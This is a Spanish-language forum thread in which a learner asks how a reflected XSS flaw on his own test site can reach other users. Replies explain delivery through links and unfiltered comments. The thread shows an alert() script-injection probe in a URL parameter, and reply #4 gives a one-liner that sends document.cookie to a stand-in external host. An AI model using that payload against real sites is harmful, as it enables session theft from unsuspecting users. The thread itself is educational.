Ataque Xss

malakian · #1 (**permalink**) 03/01/2013, 00:02

Hola muchach@s...

Estoy investigando sobre el tema, y tengo una sola duda...

Hice que una web que tengo tenga una vulnerabilidad para XSS, ahora la inyección funciona.

Mi pregunta es:

Que sentido tiene, si UNICAMENTE yo veo ese ataque, es decir, eso se está ejecutando en el cliente, pero que debilidad tiene si el ataque solo lo puede ver el mismo atacante..

No se si me hago entender... yo no me quiero poner a darmelas de "anonymous"

porque no es así solo quiero entender como funciona, como puedo hacer que varias personas en diferentes equipos vean el ataque

Es que solo lo ven si me siento en el cliente...

Como funciona la denegación de servicios? con un while (1) ???

Bueno, muchas preguntas, agradezco cualquier comentario. Gracias

David · #2 (**permalink**) 03/01/2013, 00:25

Cita:

Iniciado por Wikipedia

XSS es un vector de ataque que puede ser utilizado para robar información delicada, secuestrar sesiones de usuario, y comprometer el navegador, subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde los primeros días de la Web.

http://es.wikipedia.org/wiki/Cross-site_scripting

Poder explotarlo para alguno de esos propósitos depende mucho de dónde se encuentra la vulnerabilidad.

malakian · #3 (**permalink**) 03/01/2013, 00:40

Hola David, gracias por contestar.

Si, yo leí eso hace rato..

ahora, hablemos de esta vulnerabilidad en concreto

Código:

error.php?error=Usuario%20Invalido

Ataque

Código:

error.php?error=<script>alert('error')</script>

Listo se pudo hacer el ataque...

Ahora ud y yo estamos sentados en la misma sala, cada uno con su computador

como puedo atacarlo a ud desde ahí, si solo se ejecuta este tipo de ataques desde el cliente??, o debería esperar a que ud no cierre sesión??

Gracias

pateketrueke · #4 (**permalink**) 03/01/2013, 01:08

Un ataque de XSS no es, digamos, de manera directa.

No esperarás a ejecutar instrucciones arbitrariamente en el navegador de ningún otro sólo con Javascript.

Un ejemplo sería algo así:

Cita:

((new Image()).src='http://hack-site.vc/trick.gif?s='+document.cookie)

La idea es que yo tomo tus cookies y las envío a mi sitio, de ahí a que pueda hacer algo con ellas es otra cosa, lo que debes entender es que lo único que se puede ejecutar es Javascript/HTML/CSS.

Pero para que funcione ni siquiera debemos estar conectados al mismo sitio ni nada, simplemente yo publico un tema, y también ahí coloco una imagen falsa que lo único que hace es lo de arriba, pero con sólo HTML.

¿Qué tipo de ataque te imaginabas posible?

Tampoco es la gran cosa.

malakian · #5 (**permalink**) 03/01/2013, 02:22

pateketrueke,

Imaginaba algo como, que encontraba una vulnerabilidad, colocaba un alert('hola') y que todo el mundo lo iba a ver, eso no era lo que entendía, ahora empiezo a ver la luz

muchas gracias, sigo investigando.

David · #6 (**permalink**) 03/01/2013, 09:03

Cuando es indirecto, se puede dejar ese enlace en un comentario en la web, o en algún lugar que sea visible a muchas personas, tampoco es que sea demasiado difícil hacer que la gente siga un enlace.

Como dije, dependiendo de dónde está la vulnerabilidad también es posible dejar un alert('hola') o cualquier código HTML/Javascript/CSS arbitrario que sea visible a todos los visitantes de la página; como cuando un campo de un formulario para comentar no se filtra apropiadamente.